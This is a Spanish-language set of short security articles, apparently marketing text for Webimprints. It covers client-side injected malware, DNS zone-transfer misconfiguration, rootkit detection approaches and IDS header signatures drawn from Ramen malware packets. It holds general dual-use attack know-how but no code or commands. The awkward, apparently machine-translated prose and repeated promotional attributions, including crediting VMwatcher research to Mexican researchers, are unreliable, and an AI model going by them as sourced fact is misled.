Client-Side Injected Malware (CSIM) incluye los widgets no autorizados, anuncios y spyware que se inyectan en sitios web por extensiones instalados en los navegadores, o por el malware descargado involuntariamente a las computadoras de los visitantes, tabletas y dispositivos móviles según Webimprints, empresa de seguridad informática en México.

Sitios web de comercio electrónico están manipulados por las inyecciones de cliente que ni ellos ni sus visitantes son conscientes. Peor aún, muchas inyecciones parecen como parte integrante de sitio web menciona Dave Smith especialista de seguridad informática en México. Esto aumenta la posibilidad de que un visitante haga clic en una de estas inyecciones, así como el sitios pierdes la confianza que se ha construido a través del tiempo con los clientes leales.

No sólo CSIM resulta en una pérdida directa de los visitantes y las conversiones, que a menudo afecta negativamente a la experiencia de usuario. CSIM interrumpe el flujo y la navegación de un sitio, lo que lleva a un mayor porcentaje de pérdida de los clientes según especialista de empresa de pruebas de penetración. Además, puede resultar en brecha de sus términos de privacidad del sitio web como CSIM pone cookies en los navegadores de sus visitantes, a veces en nombre de su empresa. CSIM también pone en peligro la seguridad y la privacidad de la información de sus visitantes, incluyendo su dirección de correo electrónico que los expone a las campañas de spam y phishing.

El siguiente es un escenario típico que ilustra cómo un visitante inocente se infecta por CSIM – por malware y mediante la inyección de un anuncio en un sitio de comercio electrónico mencionó experto de proveedor de seguridad informática en México:

1. Los desarrolladores crean una extensión para la inyección en el navegador.

2. Plataformas de terceros se utilizan para agrupar la extensión o aplicación de software basado en un modelo de reparto de ingresos.

3. El visitante inocente descarga una extensión o aplicación (como un reproductor de vídeo gratuito) con un inyector.

4. El visitante decide ir de compras en un sitio de comercio electrónico.

5. La página web que se sirve desde el servidor web como debe aparecer correctamente.

6. Inmediatamente después de la renderización de páginas, el navegador del visitante inyecta el malware en el espacio vacío o anula el contenido existente. Dependiendo de su sofisticación, la inyección puede o no puede ser aparente para el visitante y eso puede detectar durante pruebas de penetración.

El primer paso para solucionar este problema es crear conciencia entre las partes interesadas dentro de su organización que existe la amenaza, así como el

reconocimiento de la magnitud de su negocio. También es importante entender que sus soluciones de seguridad actuales no fueron diseñadas para prevenir este tipo de amenaza. Webimprints, una empresa de seguridad informática en México ofrece una tecnología innovadora que proporciona sitios de comercio electrónico con una solución fácil de implementar, de extremo a extremo para el manejo de amenazas de CSIM.

Vulnerabilidad de DNS transferencias de zona

Las transferencias de zona permiten que los servidores autorizados de nombres dentro de las redes para solicitar y recibir copias completas de los registros de recursos para una zona particular en una red. Esto es importante, sobre todo cuando una institución quiere la posibilidad de compartir una gran cantidad de información entre sus usuarios según Webimprints, proveedor de pruebas de penetración en México.

En una red, una zona actúa como una base de datos para un solo nombre de dominio DNS - por ejemplo, usc.edu. Si otros subdominios: se añaden (es decir mail.usc.edu), pueden convertirse en parte de ese dominio y se almacenan dentro de ese mismo registro, o podrían pertenecer a otra zona.

Dave Smith especialista de seguridad de datos en México menciona que las transferencias de zona dentro de la red pueden ser útiles por razones legítimas, como comprobar si las direcciones IP coinciden con los nombres, o para compartir datos. Dentro de un sistema de colegio o universidad, las transferencias de zona pueden ser deseables para compartir bibliotecas y otros recursos esenciales para el personal y los estudiantes. En el lado oscuro, sin embargo, lo que permite transferencias de zona también deja el sistema vulnerable a ataques si alguno de los servidores autorizados de nombres está configurado mal.

Servidores mal configurados no operan de la manera que deberían, y un atacante fuera pueden pedir una transferencia de zona y el servidor dará a ellos sin hacer preguntas.

La mayoría de las redes han mitigado este problema al no permitir transferencias de zona en la red, pero en una gran cantidad de instituciones educativas no es el caso.

El único lugar que existe, sin embargo, es en los institutos como universidades que están tan desesperados por estar vinculados a otras universidades que están intercambiando información constantemente entre sí. Sólo es necesario que haya un servidor de nombres DNS mal configurado y un hacker puede hackear todas las personas que están conectadas a la red según especialista de empresa de pruebas de penetración.

Una vez que el atacante ha realizado la transferencia de zona que él o ella es capaz de ver todos los dispositivos que están conectados al sistema hasta el punto de la transferencia de zona y puede usar esa información para hackaer usuarios. Entonces, ¿cómo pueden sys-admins mitigar los problemas con las transferencias de zona? La solución más simple, por supuesto es no permitir que ellos, pero en el caso de que la red quiere seguir permitiendo las transferencias de zona, la mejor solución es implementar restricciones de IP sobre quién puede solicitar y recibir una transferencia de zona mencionó experto de proveedor de seguridad de datos en México.

Sistemas de detction de rootkits

Los sistemas informáticos se enfrentan a las amenazas de muchos tipos de ataques como rootkits. Un rootkit es un tipo de software oculto, a menudo malicioso, diseñado para ocultar la existencia de procesos o programas de métodos normales de detección para habilitación de acceso privilegiado a un equipo. Una vez que los atacantes han obtenido acceso root, van a instalar rootkits para ocultar la evidencia para que los administradores de sistemas no puedan detectarlos según Webimprints, empresa de pruebas de penetración en México.

Además de robo de información sensible, los atacantes también utilizan rootkits a crear puertas traseras para ataques posteriores. Los rootkits son difíciles de detectar ya que un rootkit intenta ocultar su existencia de los programas anti-malware. Detección de rootkit se puede clasificar en tres grupos explica Dave Smith experto de seguridad de datos en México.

En el primer grupo, los investigadores de pruebas de penetración analizan y caracterizan los comportamientos de los rootkits. Por ejemplo, HookFinder proporciona información valiosa y detalles sobre los mecanismos de enganchar que se utilizan por los atacantes. K-Tracer y Panorama son herramientas automáticas que pueden de manera eficiente analizar el acceso a datos y trayectorias de propagación y comportamientos de manipulación de los diferentes programas.

En el segundo grupo, los investigadores de pruebas de penetración tratan de detectar los rootkits mediante ciertos síntomas que se exhiben por la intrusión. Por ejemplo, SBCFI (statebased integridad de control de flujo) supervisa la integridad del núcleo del sistema operativo para detectar cambios maliciosos.

En el tercer grupo, las herramientas están diseñadas para evitar los cambios por los rootkits en el núcleo del sistema operativo. La emergencia de la computación en nube se abre un nuevo horizonte para la solución de este problema.

En un entorno virtualizado, el hipervisor puede monitorear el comportamiento de las máquinas virtuales. Mientras que un rootkit puede ser capaz de engañar al sistema operativo virtual, será muy difícil para ocultar un proceso malicioso desde el hipervisor. Varios sistemas de seguridad se han desarrollado para la detección de rootkits en máquinas virtuales. Por ejemplo, investigadores de seguridad de datos en México., utiliza el Vmwatcher y revisa la máquina virtual en general de una manera no intrusiva para inspeccionar estados de bajo nivel de VM.

UCON es un programa basada en eventos. Se mantiene accede al sistema a nivel bajo y asegura que los accesos no pueden ser comprometidas por procesos internos de una máquina virtual.

Entender el desarrollo de una firma basada en valores de cabecera

Vamos a entender a través de un ejemplo de famoso malware Ramen porque los paquetes de ese malware tienen varias características distintivas. Éstos son algunos de los valores de cabecera IP y TCP que estaban presentes en los paquetes de Ramen malware. Varias direcciones IP de origen

• Puerto de origen TCP 21, puerto de destino 21

• Tipo de servicio 0

• Número de identificación IP 39426

• Banderas SYN y FIN marcado

• Varios números de secuencia establecida

• Varios números de confirmación establecida

• Tamaño de la ventana TCP 1028

Según Webimprints, empresa de seguridad informática, durante el desarrollo de firmas basadas en los valores de cabecera debemos buscar valores que son ilegales, inusual o sospechoso - en muchos casos, estas características se corresponden con las vulnerabilidades que el hacker está tratando de explotar, o una técnica particular que utiliza herramienta del atacante.

Dice Dave Smith experto de pruebas de penetración que ciertas características de los paquetes de Ramen malware podríamos utilizarse en firmas:

Una señal bien conocida de la actividad maliciosa es tener las banderas SYN y FIN marcados en un paquete.

Otra señal de que estos paquetes son modificados es que el número de reconocimiento tiene varios valores, pero la bandera ACK no se ha establecido. Cuando esa bandera no está definida, el número de reconocimiento se debe establecer en 0.

Según investigadores de empresa de seguridad informática, otra característica sospechosa es que los puertos de origen y destino están establecidos en 21, por lo general asociados con los servidores FTP. Cuando estos puertos son iguales, decimos que son reflexivos. En el tráfico FTP normal, esperamos ver un número alto de puerto (mayor que 1023) como el origen y el puerto 21 como destino.

Otra característica sospechosa es que el tamaño de la ventana TCP, que siempre se establece en 1028, normalmente, el tamaño de la ventana TCP es más grande que 1028 y no es la misma en todos los paquetes.

Otra característica sospechosa es que el número de identificación IP, que se fija en todos los paquetes a 39426. Este valor debe variar entre los paquetes, por lo que el mismo valor es muy sospechoso.

Como se señaló anteriormente experto de empresa de pruebas de penetración hemos identificado cinco posibles elementos de la firma y tenemos muchas opciones diferentes para el desarrollo de una firma basada en la cabecera, ya que una firma puede incluir una o más de estas características.

Una simple firma tendría configurado elementos de banderas SYN y FIN establecidos. Aunque esto sin duda sería un buen indicador de la actividad maliciosa probable es que no nos da ninguna idea de por qué se produjo esta actividad. Sin embargo, una firma basada en los cinco elementos sospechosas puede ser demasiado específica. Aunque proporcionará información mucho más precisa sobre el origen de la actividad, sino que también sería mucho menos eficiente.

Podríamos desarrollar varias firmas que utilizan varias combinaciones de estas características. Desarrollo de firmas depende mucho sobre los ambientes y tipos de ataques y experiencia con los sistemas de detección de intrusos mencionan expertos de empresa de seguridad informática en México.